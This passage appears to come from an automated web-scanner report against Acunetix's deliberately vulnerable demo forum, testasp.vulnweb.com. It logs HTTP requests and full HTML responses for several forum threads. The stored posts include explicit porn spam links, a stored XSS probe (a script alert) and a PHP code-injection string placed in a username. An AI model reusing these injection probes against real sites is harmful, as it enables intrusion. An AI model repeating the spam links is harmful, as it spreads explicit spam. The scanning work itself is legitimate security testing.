Free Huge Butt Porn, Big Booty Pics - 178.20.55.18</div><div class='posttext'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn http://chickasawpornloaderfree.topanasex.com/?elena tammy amazing race 14 pics porn emporers new school porn matue gay porn schoolgirl anami porn newcomers porn star 2008 girl </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=33 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4533 |
| Response Body - size: 4,533 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Best Nude Playmates & Centerfolds, Beautiful galleries daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>kristiela3</b> on 3/13/2022 3:28:51 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates - 185.220.101.158</div><div class='posttext'>Sexy photo galleries, daily updated collections http://classicporn.bestsexyblog.com/?tiana free cartton porn videos singapore 3gp porn xhamster black porn tube bully threpy porn free amutear porn movies </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=34 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4422 |
| Response Body - size: 4,422 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum New hot project galleries, daily updates </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/New hot project galleries, daily updates </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>friedajd1</b> on 3/13/2022 9:02:56 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>New hot project galleries, daily updates - 109.70.100.83</div><div class='posttext'>Free Porn Galleries - Hot Sex Pictures http://allsexiimage.paintandparty.hotblognetwork.com/?ximena messy sex porn free porn excite deaf mute porn internet porn help la bleu porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=35 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4471 |
| Response Body - size: 4,471 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Free Porn Pictures and Best HD Sex Photos </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Free Porn Pictures and Best HD Sex Photos </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>dianezg60</b> on 3/13/2022 11:25:30 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Free Porn Pictures and Best HD Sex Photos - 185.220.102.248</div><div class='posttext'>Daily updated super sexy photo galleries http://abiquiu.lexixxx.com/?felicia free hot top porn web free gay porn clips video shorties categorized porn moviewas fanfiction naruto porn stories asian pics xxx asia quest porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=36 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4174 |
| Response Body - size: 4,174 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum test </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/test </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/14/2022 1:14:17 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>test - 180.75.236.192</div><div class='posttext'><script>alert("HI")</script></div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=37 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4421 |
| Response Body - size: 4,421 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot photo galleries blogs and pictures </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot photo galleries blogs and pictures </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>sethpq11</b> on 3/14/2022 2:11:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot photo galleries blogs and pictures - 95.214.54.97</div><div class='posttext'>My new hot project|enjoy new website http://videoonly.hotnatalia.com/?danielle party in limo porn real family orgy porn donna kane porn video top 100 porn stars list balls touching porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=38 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4138 |
| Response Body - size: 4,138 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>${@print(md5(31337))}\</b> on 3/14/2022 4:18:48 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 54.208.242.36</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=39 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4374 |
| Response Body - size: 4,374 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Shemale Sexy Galleries </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> 